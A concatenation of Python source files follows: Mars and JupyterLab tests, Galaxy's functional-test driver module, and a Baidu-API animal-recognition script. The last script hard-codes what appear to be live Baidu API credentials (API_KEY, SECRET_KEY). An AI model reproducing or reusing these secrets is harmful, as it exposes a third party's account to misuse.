pd.testing.assert_series_equal(batch, raw_data.iloc[i * 15: (i + 1) * 15])
i = 0
for result_item, expect_item in zip(s.iteritems(batch_size=15),
raw_data.iteritems()):
assert result_item[0] == expect_item[0]
assert result_item[1] == expect_item[1]
i += 1
assert i == len(raw_data)
# test to_dict
assert s.to_dict() == raw_data.to_dict()
CONFIG = """
inherits: '@default'
session:
custom_log_dir: '{custom_log_dir}'
"""
@pytest.fixture
def fetch_log_setup():
from ..deploy.oscar.tests.session import new_test_session
with tempfile.TemporaryDirectory() as temp_dir:
config = io.StringIO(CONFIG.format(custom_log_dir=temp_dir))
sess = new_test_session(default=True,
config=load_service_config_file(config),
n_cpu=8)
with option_context({'show_progress': False}):
try:
yield sess
finally:
sess.stop_server()
def test_fetch_log(fetch_log_setup):
def f():
print('test')
r = mr.spawn(f)
r.execute()
log = r.fetch_log()
assert str(log).strip() == 'test'
# test multiple functions
def f1(size):
print('f1' * size)
sys.stdout.flush()
fs = mr.ExecutableTuple([mr.spawn(f1, 30), mr.spawn(f1, 40)])
execute(*fs)
log = fetch_log(*fs, offsets=20, sizes=10)
assert str(log[0]).strip() == ('f1' * 30)[20:30]
assert str(log[1]).strip() == ('f1' * 40)[20:30]
assert len(log[0].offsets) > 0
assert all(s > 0 for s in log[0].offsets)
assert len(log[1].offsets) > 0
assert all(s > 0 for s in log[1].offsets)
assert len(log[0].chunk_op_keys) > 0
# test negative offsets
log = fs.fetch_log(offsets=-20, sizes=10)
assert str(log[0]).strip() == ('f1' * 30 + '\n')[-20:-10]
assert str(log[1]).strip() == ('f1' * 40 + '\n')[-20:-10]
assert all(s > 0 for s in log[0].offsets) is True
assert len(log[1].offsets) > 0
assert all(s > 0 for s in log[1].offsets) is True
assert len(log[0].chunk_op_keys) > 0
# test negative offsets which represented in string
log = fetch_log(*fs, offsets='-0.02K', sizes='0.01K')
assert str(log[0]).strip() == ('f1' * 30 + '\n')[-20:-10]
assert str(log[1]).strip() == ('f1' * 40 + '\n')[-20:-10]
assert all(s > 0 for s in log[0].offsets) is True
assert len(log[1].offsets) > 0
assert all(s > 0 for s in log[1].offsets) is True
assert len(log[0].chunk_op_keys) > 0
def test_nested():
print('level0')
fr = mr.spawn(f1, 1)
fr.execute()
print(fr.fetch_log())
r = mr.spawn(test_nested)
r.execute()
log = str(r.fetch_log())
assert 'level0' in log
assert 'f1' in log
df = md.DataFrame(mt.random.rand(10, 3), chunk_size=5)
def df_func(c):
print('df func')
return c
df2 = df.map_chunk(df_func)
df2.execute()
log = df2.fetch_log()
assert 'Chunk op key:' in str(log)
assert 'df func' in repr(log)
assert len(str(df.fetch_log())) == 0
def test_host(rndf):
rm = mr.spawn(nested, rndf)
rm.execute()
print(rm.fetch_log())
def nested(_rndf):
print('log_content')
ds = [mr.spawn(test_host, n, retry_when_fail=False)
for n in np.random.rand(4)]
xtp = execute(*ds)
for log in fetch_log(*xtp):
assert str(log).strip() == 'log_content'
def test_threaded():
import threading
exc_info = None
def print_fun():
nonlocal exc_info
try:
print('inner')
except: # noqa: E722 # nosec # pylint: disable=bare-except
exc_info = sys.exc_info()
print_thread = threading.Thread(target=print_fun)
print_thread.start()
print_thread.join()
if exc_info is not None:
raise exc_info[1].with_traceback(exc_info[-1])
print('after')
rm = mr.spawn(test_threaded)
rm.execute()
logs = str(rm.fetch_log()).strip()
assert logs == 'inner\nafter'
|
test_build_api.py
|
"""Test the kernels service API."""
from tempfile import TemporaryDirectory
import threading
from jupyterlab.labapp import LabApp
from jupyterlab_server.tests.utils import APITester, LabTestBase
from notebook.tests.launchnotebook import assert_http_error
class BuildAPITester(APITester):
"""Wrapper for build REST API requests"""
url = 'lab/api/build'
def getStatus(self):
return self._req('GET', '')
def build(self):
return self._req('POST', '')
def clear(self):
return self._req('DELETE', '')
class BuildAPITest(LabTestBase):
"""Test the build web service API"""
Application = LabApp
def tempdir(self):
td = TemporaryDirectory()
self.tempdirs.append(td)
return td.name
def setUp(self):
# Any TemporaryDirectory objects appended to this list will be cleaned
# up at the end of the test run.
self.tempdirs = []
@self.addCleanup
def cleanup_tempdirs():
for d in self.tempdirs:
d.cleanup()
self.build_api = BuildAPITester(self.request)
def test_get_status(self):
"""Make sure there are no kernels running at the start"""
resp = self.build_api.getStatus().json()
assert 'status' in resp
assert 'message' in resp
def test_build(self):
resp = self.build_api.build()
assert resp.status_code == 200
def test_clear(self):
with assert_http_error(500):
self.build_api.clear()
def build_thread():
with assert_http_error(500):
self.build_api.build()
t1 = threading.Thread(target=build_thread)
t1.start()
while 1:
resp = self.build_api.getStatus().json()
if resp['status'] == 'building':
break
resp = self.build_api.clear()
assert resp.status_code == 204
|
driver_util.py
|
"""Scripts for drivers of Galaxy functional tests."""
import collections
import httplib
import json
import logging
import os
import random
import shutil
import socket
import sys
import tempfile
import threading
import time
from six.moves.urllib.request import urlretrieve
import nose.config
import nose.core
import nose.loader
import nose.plugins.manager
from paste import httpserver
from .api_util import get_master_api_key, get_user_api_key
from .tool_shed_util import parse_tool_panel_config
from .nose_util import run
from .instrument import StructuredTestDataPlugin
from functional import database_contexts
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.web import buildapp
from galaxy.webapps.tool_shed.app import UniverseApplication as ToolshedUniverseApplication
from galaxy.util import asbool
from galaxy.util.properties import load_app_properties
from base.test_logging import logging_config_file
galaxy_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir))
DEFAULT_WEB_HOST = "localhost"
GALAXY_TEST_DIRECTORY = os.path.join(galaxy_root, "test")
GALAXY_TEST_FILE_DIR = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
TOOL_SHED_TEST_DATA = os.path.join(GALAXY_TEST_DIRECTORY, "shed_functional", "test_data")
FRAMEWORK_TOOLS_DIR = os.path.join(GALAXY_TEST_DIRECTORY, "functional", "tools")
FRAMEWORK_UPLOAD_TOOL_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "upload_tool_conf.xml")
FRAMEWORK_SAMPLE_TOOLS_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "samples_tool_conf.xml")
FRAMEWORK_DATATYPES_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "sample_datatypes_conf.xml")
MIGRATED_TOOL_PANEL_CONFIG = 'config/migrated_tools_conf.xml'
INSTALLED_TOOL_PANEL_CONFIGS = [
os.environ.get('GALAXY_TEST_SHED_TOOL_CONF', 'config/shed_tool_conf.xml')
]
DEFAULT_LOCALES = "en"
log = logging.getLogger("test_driver")
def setup_tool_shed_tmp_dir():
tool_shed_test_tmp_dir = os.environ.get('TOOL_SHED_TEST_TMP_DIR', None)
if tool_shed_test_tmp_dir is None:
tool_shed_test_tmp_dir = tempfile.mkdtemp()
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the hgweb.config file, the database, new repositories, etc. Since the tool shed browses repository contents via HTTP,
# the full path to the temporary directory where the repositories are located cannot contain invalid URL characters.
os.environ[ 'TOOL_SHED_TEST_TMP_DIR' ] = tool_shed_test_tmp_dir
return tool_shed_test_tmp_dir
def get_galaxy_test_tmp_dir():
"""Create test directory for use by Galaxy server being setup for testing."""
galaxy_test_tmp_dir = os.environ.get('GALAXY_TEST_TMP_DIR', None)
if galaxy_test_tmp_dir is None:
galaxy_test_tmp_dir = tempfile.mkdtemp()
return galaxy_test_tmp_dir
def configure_environment():
"""Hack up environment for test cases."""
# No-op; remove if unused.
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ[ 'HTTP_ACCEPT_LANGUAGE' ] = DEFAULT_LOCALES
# Used by get_filename in tool shed's twilltestcase.
if "TOOL_SHED_TEST_FILE_DIR" not in os.environ:
os.environ["TOOL_SHED_TEST_FILE_DIR"] = TOOL_SHED_TEST_DATA
def build_logger():
"""Build a logger for test driver script."""
return log
def setup_galaxy_config(
tmpdir,
use_test_file_dir=False,
default_install_db_merged=True,
default_tool_data_table_config_path=None,
default_shed_tool_data_table_config=None,
default_job_config_file=None,
enable_tool_shed_check=False,
default_tool_conf=None,
shed_tool_conf=None,
datatypes_conf=None,
update_integrated_tool_panel=False,
):
"""Setup environment and build config for test Galaxy instance."""
if not os.path.exists(tmpdir):
os.makedirs(tmpdir)
file_path = os.path.join(tmpdir, 'files')
template_cache_path = tempfile.mkdtemp(prefix='compiled_templates_', dir=tmpdir)
new_file_path = tempfile.mkdtemp(prefix='new_files_path_', dir=tmpdir )
job_working_directory = tempfile.mkdtemp(prefix='job_working_directory_', dir=tmpdir)
if use_test_file_dir:
galaxy_test_file_dir = os.environ.get('GALAXY_TEST_FILE_DIR', GALAXY_TEST_FILE_DIR)
os.environ['GALAXY_TEST_FILE_DIR'] = galaxy_test_file_dir
first_test_file_dir = galaxy_test_file_dir.split(",")[0]
if not os.path.isabs(first_test_file_dir):
first_test_file_dir = os.path.join(galaxy_root, first_test_file_dir)
library_import_dir = first_test_file_dir
import_dir = os.path.join(first_test_file_dir, 'users')
if os.path.exists(import_dir):
user_library_import_dir = import_dir
else:
user_library_import_dir = None
else:
user_library_import_dir = None
library_import_dir = None
job_config_file = os.environ.get('GALAXY_TEST_JOB_CONFIG_FILE', default_job_config_file)
tool_path = os.environ.get('GALAXY_TEST_TOOL_PATH', 'tools')
tool_dependency_dir = os.environ.get('GALAXY_TOOL_DEPENDENCY_DIR', None)
if tool_dependency_dir is None:
tool_dependency_dir = tempfile.mkdtemp(dir=tmpdir, prefix="tool_dependencies")
tool_data_table_config_path = _tool_data_table_config_path(default_tool_data_table_config_path)
default_data_manager_config = 'config/data_manager_conf.xml.sample'
for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml' ]:
if os.path.exists( data_manager_config ):
default_data_manager_config = data_manager_config
data_manager_config_file = "%s,test/functional/tools/sample_data_manager_conf.xml" % default_data_manager_config
master_api_key = get_master_api_key()
# Data Manager testing temp path
# For storing Data Manager outputs and .loc files so that real ones don't get clobbered
galaxy_data_manager_data_path = tempfile.mkdtemp(prefix='data_manager_tool-data', dir=tmpdir)
tool_conf = os.environ.get('GALAXY_TEST_TOOL_CONF', default_tool_conf)
if tool_conf is None:
# As a fallback always at least allow upload.
tool_conf = FRAMEWORK_UPLOAD_TOOL_CONF
if shed_tool_conf is not None:
tool_conf = "%s,%s" % (tool_conf, shed_tool_conf)
shed_tool_data_table_config = default_shed_tool_data_table_config
if shed_tool_data_table_config is None:
shed_tool_data_table_config = 'config/shed_tool_data_table_conf.xml'
config = dict(
admin_users='[email protected]',
allow_library_path_paste=True,
allow_user_creation=True,
allow_user_deletion=True,
api_allow_run_as='[email protected]',
auto_configure_logging=logging_config_file is None,
check_migrate_tools=False,
cleanup_job='onsuccess',
data_manager_config_file=data_manager_config_file,
enable_beta_tool_formats=True,
file_path=file_path,
galaxy_data_manager_data_path=galaxy_data_manager_data_path,
id_secret='changethisinproductiontoo',
job_config_file=job_config_file,
job_queue_workers=5,
job_working_directory=job_working_directory,
library_import_dir=library_import_dir,
log_destination="stdout",
new_file_path=new_file_path,
master_api_key=master_api_key,
running_functional_tests=True,
shed_tool_data_table_config=shed_tool_data_table_config,
template_cache_path=template_cache_path,
template_path='templates',
tool_config_file=tool_conf,
tool_data_table_config_path=tool_data_table_config_path,
tool_parse_help=False,
tool_path=tool_path,
update_integrated_tool_panel=update_integrated_tool_panel,
use_tasked_jobs=True,
use_heartbeat=False,
user_library_import_dir=user_library_import_dir,
)
config.update(database_conf(tmpdir))
config.update(install_database_conf(tmpdir, default_merged=default_install_db_merged))
if datatypes_conf is not None:
config['datatypes_config_file'] = datatypes_conf
if enable_tool_shed_check:
config["enable_tool_shed_check"] = enable_tool_shed_check
config["hours_between_check"] = 0.001
if tool_dependency_dir:
config["tool_dependency_dir"] = tool_dependency_dir
# Used by shed's twill dependency stuff - todo read from
# Galaxy's config API.
os.environ["GALAXY_TEST_TOOL_DEPENDENCY_DIR"] = tool_dependency_dir
return config
def _tool_data_table_config_path(default_tool_data_table_config_path=None):
tool_data_table_config_path = os.environ.get('GALAXY_TEST_TOOL_DATA_TABLE_CONF', default_tool_data_table_config_path)
if tool_data_table_config_path is None:
# ... otherwise find whatever Galaxy would use as the default and
# append the sample data for functional tests to that.
default_tool_data_config = 'config/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml' ]:
if os.path.exists( tool_data_config ):
default_tool_data_config = tool_data_config
tool_data_table_config_path = '%s,test/functional/tool-data/sample_tool_data_tables.xml' % default_tool_data_config
return tool_data_table_config_path
def nose_config_and_run( argv=None, env=None, ignore_files=[], plugins=None ):
"""Setup a nose context and run tests.
Tests are specified by argv (defaulting to sys.argv).
"""
if env is None:
env = os.environ
if plugins is None:
plugins = nose.plugins.manager.DefaultPluginManager()
if argv is None:
argv = sys.argv
test_config = nose.config.Config(
env=os.environ,
ignoreFiles=ignore_files,
plugins=plugins,
)
# Add custom plugin to produce JSON data used by planemo.
test_config.plugins.addPlugin( StructuredTestDataPlugin() )
test_config.configure( argv )
result = run( test_config )
success = result.wasSuccessful()
return success
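# Illustrative sketch (not part of the original module): driving the nose
# wrapper above for a single, hypothetical test module. Defined here for
# documentation purposes and never called by the driver itself.
def _example_run_single_module():
    # Equivalent to `nosetests functional.test_toolbox`, with the structured
    # test data plugin attached by nose_config_and_run().
    return nose_config_and_run(argv=["nosetests", "functional.test_toolbox"])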
def copy_database_template( source, db_path ):
"""Copy a 'clean' sqlite template database.
From file or URL to specified path for sqlite database.
"""
db_path_dir = os.path.dirname(db_path)
if not os.path.exists(db_path_dir):
os.makedirs(db_path_dir)
if os.path.exists(source):
shutil.copy(source, db_path)
assert os.path.exists(db_path)
elif source.lower().startswith(("http://", "https://", "ftp://")):
urlretrieve(source, db_path)
else:
raise Exception( "Failed to copy database template from source %s" % source )
def database_conf(db_path, prefix="GALAXY"):
"""Find (and populate if needed) Galaxy database connection."""
database_auto_migrate = False
dburi_var = "%s_TEST_DBURI" % prefix
if dburi_var in os.environ:
database_connection = os.environ[dburi_var]
else:
default_db_filename = "%s.sqlite" % prefix.lower()
template_var = "%s_TEST_DB_TEMPLATE" % prefix
db_path = os.path.join(db_path, default_db_filename)
if template_var in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
copy_database_template(os.environ[template_var], db_path)
database_auto_migrate = True
database_connection = 'sqlite:///%s' % db_path
config = {
"database_connection": database_connection,
"database_auto_migrate": database_auto_migrate
}
if not database_connection.startswith("sqlite://"):
config["database_engine_option_max_overflow"] = "20"
config["database_engine_option_pool_size"] = "10"
return config
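# Illustrative sketch (not part of the original module): how database_conf()
# is expected to behave when neither GALAXY_TEST_DBURI nor
# GALAXY_TEST_DB_TEMPLATE is set - it falls back to a fresh sqlite file under
# the supplied directory. The temporary directory is hypothetical and created
# only for the example.
def _example_database_conf_defaults():
    example_dir = tempfile.mkdtemp()
    conf = database_conf(example_dir)
    # e.g. {'database_connection': 'sqlite:////tmp/.../galaxy.sqlite',
    #       'database_auto_migrate': False}
    assert conf["database_connection"].startswith("sqlite:///")
    return conf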
def install_database_conf(db_path, default_merged=False):
if 'GALAXY_TEST_INSTALL_DBURI' in os.environ:
install_galaxy_database_connection = os.environ['GALAXY_TEST_INSTALL_DBURI']
elif asbool(os.environ.get('GALAXY_TEST_INSTALL_DB_MERGED', default_merged)):
install_galaxy_database_connection = None
else:
install_galaxy_db_path = os.path.join(db_path, 'install.sqlite')
install_galaxy_database_connection = 'sqlite:///%s' % install_galaxy_db_path
conf = {}
if install_galaxy_database_connection is not None:
conf["install_database_connection"] = install_galaxy_database_connection
return conf
def database_files_path(test_tmpdir, prefix="GALAXY"):
"""Create a mock database/ directory like in GALAXY_ROOT.
Use prefix to decide which environment variable (TOOL_SHED_TEST_DBPATH or
GALAXY_TEST_DBPATH) overrides the generated path.
"""
environ_var = "%s_TEST_DBPATH" % prefix
if environ_var in os.environ:
db_path = os.environ[environ_var]
else:
tempdir = tempfile.mkdtemp(dir=test_tmpdir)
db_path = os.path.join(tempdir, 'database')
return db_path
def _get_static_settings():
"""Configuration required for Galaxy static middleware.
Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
static_dir = os.path.join(galaxy_root, "static")
# TODO: these should be copied from config/galaxy.ini
return dict(
static_enabled=True,
static_cache_time=360,
static_dir=static_dir,
static_images_dir=os.path.join(static_dir, 'images', ''),
static_favicon_dir=os.path.join(static_dir, 'favicon.ico'),
static_scripts_dir=os.path.join(static_dir, 'scripts', ''),
static_style_dir=os.path.join(static_dir, 'june_2007_style', 'blue'),
static_robots_txt=os.path.join(static_dir, 'robots.txt'),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent to ``app_factory``."""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
global_conf.update( _get_static_settings() )
return global_conf
def wait_for_http_server(host, port):
"""Wait for an HTTP server to boot up."""
# Test if the server is up
for i in range( 10 ):
# directly test the app, not the proxy
conn = httplib.HTTPConnection(host, port)
conn.request( "GET", "/" )
if conn.getresponse().status == 200:
break
time.sleep( 0.1 )
else:
template = "Test HTTP server on host %s and port %s did not return '200 OK' after 10 tries"
message = template % (host, port)
raise Exception(message)
def serve_webapp(webapp, port=None, host=None):
"""Serve the webapp on a recommend port or a free one.
Return the port the webapp is running one.
"""
server = None
if port is not None:
server = httpserver.serve( webapp, host=host, port=port, start_loop=False )
else:
random.seed()
for i in range( 0, 9 ):
try:
port = str( random.randint( 8000, 10000 ) )
server = httpserver.serve( webapp, host=host, port=port, start_loop=False )
break
except socket.error as e:
if e[0] == 98:
continue
raise
else:
raise Exception( "Unable to open a port between %s and %s to start Galaxy server" % ( 8000, 10000 ) )
t = threading.Thread( target=server.serve_forever )
t.start()
return server, port
def cleanup_directory(tempdir):
"""Clean up temporary files used by test unless GALAXY_TEST_NO_CLEANUP is set.
Also respect TOOL_SHED_TEST_NO_CLEANUP for legacy reasons.
"""
skip_cleanup = "GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ
if skip_cleanup:
log.info( "GALAXY_TEST_NO_CLEANUP is on. Temporary files in %s" % tempdir )
return
try:
if os.path.exists(tempdir) and not skip_cleanup:
shutil.rmtree(tempdir)
except Exception:
pass
def setup_shed_tools_for_test(app, tmpdir, testing_migrated_tools, testing_installed_tools):
"""Modify Galaxy app's toolbox for migrated or installed tool tests."""
# Store a jsonified dictionary of tool_id : GALAXY_TEST_FILE_DIR pairs.
galaxy_tool_shed_test_file = os.path.join(tmpdir, 'shed_tools_dict')
shed_tools_dict = {}
if testing_migrated_tools:
has_test_data, shed_tools_dict = parse_tool_panel_config(MIGRATED_TOOL_PANEL_CONFIG, shed_tools_dict)
elif testing_installed_tools:
for shed_tool_config in INSTALLED_TOOL_PANEL_CONFIGS:
has_test_data, shed_tools_dict = parse_tool_panel_config(shed_tool_config, shed_tools_dict)
# Persist the shed_tools_dict to the galaxy_tool_shed_test_file.
with open(galaxy_tool_shed_test_file, 'w') as shed_tools_file:
shed_tools_file.write(json.dumps(shed_tools_dict))
if not os.path.isabs(galaxy_tool_shed_test_file):
galaxy_tool_shed_test_file = os.path.join(galaxy_root, galaxy_tool_shed_test_file)
os.environ['GALAXY_TOOL_SHED_TEST_FILE'] = galaxy_tool_shed_test_file
if testing_installed_tools:
# TODO: Do this without modifying app - that is a pretty violation
# of Galaxy's abstraction - we shouldn't require app at all let alone
# be modifying it.
tool_configs = app.config.tool_configs
# Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
# and reload the app's toolbox.
relative_migrated_tool_panel_config = os.path.join(app.config.root, MIGRATED_TOOL_PANEL_CONFIG)
if relative_migrated_tool_panel_config in tool_configs:
tool_configs.remove(relative_migrated_tool_panel_config)
for installed_tool_panel_config in INSTALLED_TOOL_PANEL_CONFIGS:
tool_configs.append(installed_tool_panel_config)
from galaxy import tools # noqa, delay import because this brings in so many modules for small tests
app.toolbox = tools.ToolBox(tool_configs, app.config.tool_path, app)
def build_galaxy_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary and use load_app_properties so
Galaxy override variables are respected. Also setup "global" references
to sqlalchemy database context for Galaxy and install databases.
"""
log.info("Galaxy database connection: %s", simple_kwargs["database_connection"])
simple_kwargs['global_conf'] = get_webapp_global_conf()
simple_kwargs['global_conf']['__file__'] = "config/galaxy.ini.sample"
simple_kwargs = load_app_properties(
kwds=simple_kwargs
)
# Build the Universe Application
app = GalaxyUniverseApplication( **simple_kwargs )
log.info( "Embedded Galaxy application started" )
database_contexts.galaxy_context = app.model.context
database_contexts.install_context = app.install_model.context
return app
def build_shed_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary. Also setup "global" reference
to sqlalchemy database context for tool shed database.
"""
log.info("Tool shed database connection: %s", simple_kwargs["database_connection"])
# TODO: Simplify global_conf to match Galaxy above...
simple_kwargs['__file__'] = 'tool_shed_wsgi.ini.sample'
simple_kwargs['global_conf'] = get_webapp_global_conf()
app = ToolshedUniverseApplication( **simple_kwargs )
database_contexts.tool_shed_context = app.model.context
log.info( "Embedded Toolshed application started" )
return app
ServerWrapper = collections.namedtuple('ServerWrapper', ['app', 'server', 'name', 'host', 'port'])
def _stop(self):
if self.server is not None:
log.info("Shutting down embedded %s web server" % self.name)
self.server.server_close()
log.info("Embedded web server %s stopped" % self.name)
if self.app is not None:
log.info("Stopping application %s" % self.name)
self.app.shutdown()
log.info("Application %s stopped." % self.name)
ServerWrapper.stop = _stop
def launch_server(app, webapp_factory, kwargs, prefix="GALAXY"):
"""Launch a web server for a given app using supplied factory.
Consistently read either GALAXY_TEST_HOST and GALAXY_TEST_PORT or
TOOL_SHED_TEST_HOST and TOOL_SHED_TEST_PORT and ensure these are
all set after this method has been called.
"""
name = prefix.lower()
host_env_key = "%s_TEST_HOST" % prefix
port_env_key = "%s_TEST_PORT" % prefix
host = os.environ.get(host_env_key, DEFAULT_WEB_HOST)
port = os.environ.get(port_env_key, None)
webapp = webapp_factory(
kwargs[ 'global_conf' ],
app=app,
use_translogger=False,
static_enabled=True
)
server, port = serve_webapp(
webapp,
host=host, port=port
)
os.environ[host_env_key] = host
os.environ[port_env_key] = port
wait_for_http_server(host, port)
log.info("Embedded web server for %s started" % name)
return ServerWrapper(
app, server, name, host, port
)
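# Illustrative sketch (not part of the original module): the intended
# lifecycle of a ServerWrapper returned by launch_server(). The arguments are
# assumed to be the same objects GalaxyTestDriver.setup() builds below.
def _example_launch_and_stop(app, webapp_factory, galaxy_config):
    server_wrapper = launch_server(app, webapp_factory, galaxy_config)
    try:
        # GALAXY_TEST_HOST / GALAXY_TEST_PORT are now also set in os.environ.
        log.info("Server reachable at %s:%s", server_wrapper.host, server_wrapper.port)
    finally:
        server_wrapper.stop()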
class TestDriver(object):
"""Responsible for the life-cycle of a Galaxy-style functional test.
Sets up servers, configures tests, runs nose, and tears things
down. This is somewhat like a Python TestCase - but different
because it is meant to provide a main() endpoint.
"""
def __init__(self):
"""Setup tracked resources."""
self.server_wrappers = []
self.temp_directories = []
def setup(self):
"""Called before tests are built."""
def build_tests(self):
"""After environment is setup, setup nose tests."""
def tear_down(self):
"""Cleanup resources tracked by this object."""
for server_wrapper in self.server_wrappers:
server_wrapper.stop()
for temp_directory in self.temp_directories:
cleanup_directory(temp_directory)
def run(self):
"""Driver whole test.
Setup environment, build tests (if needed), run test,
and finally cleanup resources.
"""
configure_environment()
self.setup()
self.build_tests()
try:
success = nose_config_and_run()
return 0 if success else 1
except Exception as e:
log.info("Failure running tests")
raise e
finally:
log.info( "Shutting down")
self.tear_down()
class GalaxyTestDriver(TestDriver):
"""Instantial a Galaxy-style nose TestDriver for testing Galaxy."""
testing_shed_tools = False
def setup(self, config_object=None):
"""Setup a Galaxy server for functional test (if needed).
Configuration options can be specified as attributes on the supplied
``config_object`` (defaults to self).
"""
if config_object is None:
config_object = self
self.external_galaxy = os.environ.get('GALAXY_TEST_EXTERNAL', None)
self.galaxy_test_tmp_dir = get_galaxy_test_tmp_dir()
self.temp_directories.append(self.galaxy_test_tmp_dir)
testing_shed_tools = getattr(config_object, "testing_shed_tools", False)
if getattr(config_object, "framework_tool_and_types", False):
default_tool_conf = FRAMEWORK_SAMPLE_TOOLS_CONF
datatypes_conf_override = FRAMEWORK_DATATYPES_CONF
else:
default_tool_conf = getattr(config_object, "default_tool_conf", None)
datatypes_conf_override = getattr(config_object, "datatypes_conf_override", None)
if self.external_galaxy is None:
tempdir = tempfile.mkdtemp(dir=self.galaxy_test_tmp_dir)
# Configure the database path.
galaxy_db_path = database_files_path(tempdir)
# Allow config object to specify a config dict or a method to produce
# one - otherwise just read the properties above and use the default
# implementation from this file.
galaxy_config = getattr(config_object, "galaxy_config", None)
if hasattr(galaxy_config, '__call__'):
galaxy_config = galaxy_config()
if galaxy_config is None:
setup_galaxy_config_kwds = dict(
use_test_file_dir=not testing_shed_tools,
default_install_db_merged=True,
default_tool_conf=default_tool_conf,
datatypes_conf=datatypes_conf_override,
)
galaxy_config = setup_galaxy_config(
galaxy_db_path,
**setup_galaxy_config_kwds
)
handle_galaxy_config_kwds = getattr(
config_object, "handle_galaxy_config_kwds", None
)
if handle_galaxy_config_kwds is not None:
handle_galaxy_config_kwds(galaxy_config)
# ---- Build Application --------------------------------------------------
self.app = build_galaxy_app(galaxy_config)
server_wrapper = launch_server(
self.app,
buildapp.app_factory,
galaxy_config,
)
self.server_wrappers.append(server_wrapper)
log.info("Functional tests will be run against %s:%s" % (server_wrapper.host, server_wrapper.port))
else:
log.info("Functional tests will be run against %s" % self.external_galaxy)
def setup_shed_tools(self, testing_migrated_tools=False, testing_installed_tools=True):
setup_shed_tools_for_test(
self.app,
self.galaxy_test_tmp_dir,
testing_migrated_tools,
testing_installed_tools
)
def build_tool_tests(self, testing_shed_tools=None):
if self.app is None:
return
if testing_shed_tools is None:
testing_shed_tools = getattr(self, "testing_shed_tools", False)
# We must make sure that functional.test_toolbox is always imported after
# database_contexts.galaxy_context is set (which occurs in this method above).
# If functional.test_toolbox is imported before database_contexts.galaxy_context
# is set, sa_session will be None in all methods that use it.
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
# When testing data managers, do not test toolbox.
functional.test_toolbox.build_tests(
app=self.app,
testing_shed_tools=testing_shed_tools,
master_api_key=get_master_api_key(),
user_api_key=get_user_api_key(),
)
return functional.test_toolbox
def run_tool_test(self, tool_id, index=0):
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
tool = self.app.toolbox.get_tool(tool_id)
testdef = tool.tests[index]
test_case_cls = functional.test_toolbox.ToolTestCase
test_case = test_case_cls(methodName="setUp") # NO-OP
test_case.shed_tool_id = None
test_case.master_api_key = get_master_api_key()
test_case.user_api_key = get_user_api_key()
test_case.setUp()
test_case.do_it(testdef)
def drive_test(test_driver_class):
"""Instantiate driver class, run, and exit appropriately."""
sys.exit(test_driver_class().run())
__all__ = [
"copy_database_template",
"build_logger",
"drive_test",
"FRAMEWORK_UPLOAD_TOOL_CONF",
"FRAMEWORK_SAMPLE_TOOLS_CONF",
"FRAMEWORK_DATATYPES_CONF",
"database_conf",
"get_webapp_global_conf",
"nose_config_and_run",
"setup_galaxy_config",
"TestDriver",
"wait_for_http_server",
]
|
animal.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Date of establishment: November 27, 2018
@author: zhangzd
"""
import cv2 # import the cv2 (OpenCV) module
import requests # import the requests module
import json # import the json module
import threading # import the threading module
import time # import the time module
import base64 # import the base64 module
import numpy as np # import the numpy module
from PIL import Image, ImageDraw, ImageFont # import the PIL modules
from xugu import *
import os
import signal
from aip import AipSpeech
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
audio_file='audio.mp3'
AppID = "15469649"
access_token = "" # define the access_token variable
API_KEY = "3vZgLINSnGGEafPflkTLzkGh" # define the API_KEY variable
SECRET_KEY = "8cUXtkMed2z86kqfyrV606ylnCmfcc48" # define the SECRET_KEY variable
frame = None # define the frame variable
now_time = 0 # define the now_time variable
animal_info = None # define the animal_info variable
client = AipSpeech(AppID, API_KEY, SECRET_KEY)
def save_audio(number):
result = client.synthesis(number, 'zh', 1, {
'vol': 5,
'per': 2
})
if not isinstance(result, dict):
with open(audio_file, 'wb') as f:
f.write(result)
os.popen("play *mp3")
def cvimg_to_b64(img):
"""
Image conversion helper: encode a binary image as a base64 string.
"""
try:
image = cv2.imencode('.jpg', img)[1] # encode the image as a JPEG byte stream held in memory
base64_data = str(base64.b64encode(image))[2:-1] # base64-encode the JPEG data
return base64_data # return the encoded string
except Exception as e:
return "error"
def get_ai_access_token():
"""
Fetch the Baidu AI access token.
"""
url = "https://aip.baidubce.com/oauth/2.0/token?grant_type=" + \
"client_credentials&client_id=%s&client_secret=%s" % (API_KEY, SECRET_KEY)
try:
response = requests.get(url)
res_text = response.text
res_json = json.loads(res_text)
return str(res_json["access_token"])
except Exception:
return "error"
def get_animal(img64):
url = "https://aip.baidubce.com/rest/2.0/image-classify/v1/animal"
url = url + "?access_token=" + access_token
data = {
"image": img64, "type": 'animal'
}
try:
response = requests.post(url,data=data)
res_text=response.content.decode("utf-8")
res_json=json.loads(res_text)
return res_json
except Exception:
return "error"
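# Illustrative sketch (added for clarity, not part of the original script):
# the intended call order is fetch a token -> base64-encode a frame -> query
# the animal-recognition endpoint. "sample.jpg" is a hypothetical file name.
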